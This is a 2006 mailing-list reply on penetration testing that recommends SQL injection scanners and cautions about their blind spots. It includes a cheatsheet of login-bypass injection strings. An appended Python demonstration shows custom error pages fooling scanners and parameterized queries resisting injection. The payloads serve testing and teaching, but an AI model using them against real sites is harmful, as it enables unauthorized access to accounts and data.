Penetration Testing mailing list archives
Re: Sql injection automated check tool
From: Joseph McCray <joe () learnsecurityonline com>
Date: Sat, 07 Oct 2006 21:11:53 -0400
Hey Juan good to see you bud.

Yeah there are a few open source SQL Injection scanners, but a lot of them are blind sql injection scanners (meaning they are basically table name bruteforcers) that you would use after you get the website to generate the sql syntax error.

I've found wapiti to be a tool that I like: http://wapiti.sourceforge.net/

There are some simpler scanners that I also like:
oedipus <--- Taken offline recently (Google is your friend).
simplescanner.pl
extendedscanner.pl

What seems to be much more popular are the SQL bruteforcers - man there are tons of them. sqlninja.pl for example can even upload netcat (you gotta love that).

The guy whose website I would recommend you check out is Justin Clarke (http://www.justinclarke.com/) and definitely read his EuSecWest Presentation (http://www.justinclarke.com/archives/2006/07/eusecwest_slide.html).

Caveat:
Just because you run these scanners against a site and they come up clean, DOES NOT mean that the site is not vuln to SQL Injection. These scanners primarily look for SQL errors returned and if the error returned (if there even is one) doesn't fit the regular expression that it's looking for then you'll be off thinking the site is ok when it's not. Custom error pages, and plenty of other things throw these types of scanners off course.

This is exactly the discussion I was having with the class that I posted about a few days ago that started all of the email traffic about reporting vulns to companies.

If it's a really big site, then I think you should run multiple scanners against the site in question, and manually verify the results. I've had several cases where one tool will report one SQL Injection, and other tools will not. I warn you that they are only a good "STARTING POINT" to a thorough Web App Assessment.

Try to change the injections you use in the scanners as well.

Here are a few from my cheatsheet:
admin:' or a=a--
admin:' or 1=1--
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Whew...long email.

Hope this helps...

Joe

On Sat, 2006-10-07 at 09:32 -0700, Juan B wrote:
Hi,
Is there a tool to use in pen test to do sql injections?
thanks very much !
Juan
--
Joe McCray
Toll Free: 1-866-892-2132
Email: joe () learnsecurityonline com
Web: https://www.learnsecurityonline.com
Learn Security Online, Inc.
* Security Games * Simulators * Challenge Servers * Courses * Hacking Competitions * Hacklab Access
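Added example, not part of the original message: a small offline model of the caveat above, showing an error-signature check reporting a string-built login query as clean once a custom error page hides the database message, and the same inputs against a parameterized query. The table, account, function names, error signature and the differential check are all assumptions constructed for illustration.

```python
import re
import sqlite3

# Constructed sample data: one account in an in-memory SQLite database.
DB = sqlite3.connect(":memory:")
DB.execute("CREATE TABLE users (name TEXT, pw TEXT)")
DB.execute("INSERT INTO users VALUES ('admin', 's3cret')")

# Hypothetical signature of the kind an error-based scanner greps responses for.
ERROR_SIG = re.compile(r"SQL (syntax )?error|unrecognized token", re.I)

def login_vulnerable(name, pw, custom_errors):
    """String-built query; returns the page body a scanner would see."""
    query = f"SELECT 1 FROM users WHERE name = '{name}' AND pw = '{pw}'"
    try:
        ok = DB.execute(query).fetchone() is not None
    except sqlite3.Error as exc:
        # A custom error page keeps the database message away from the client.
        return "Something went wrong." if custom_errors else f"SQL error: {exc}"
    return "Welcome" if ok else "Login failed"

def login_parameterized(name, pw):
    """Bound parameters: the input is treated as data, never as SQL text."""
    row = DB.execute(
        "SELECT 1 FROM users WHERE name = ? AND pw = ?", (name, pw)
    ).fetchone()
    return "Welcome" if row else "Login failed"

def error_scanner_flags(body):
    """What an error-signature scanner concludes from one response body."""
    return bool(ERROR_SIG.search(body))

def differential_flags(login):
    """Heuristic for manual verification: a lone quote should produce the
    same page as any other wrong password; a different page means the
    quote reached the SQL parser."""
    return login("nobody", "x") != login("nobody", "'")

if __name__ == "__main__":
    for custom in (False, True):
        body = login_vulnerable("nobody", "'", custom)
        print(f"custom_errors={custom}: body={body!r} "
              f"scanner_flags={error_scanner_flags(body)}")
    hidden = lambda n, p: login_vulnerable(n, p, True)
    print("differential, vulnerable + custom errors:", differential_flags(hidden))
    print("differential, parameterized:", differential_flags(login_parameterized))
    # One string from the cheatsheet above, against both implementations.
    print(login_vulnerable("nobody", "' or 1=1--", True),
          "/", login_parameterized("nobody", "' or 1=1--"))
```
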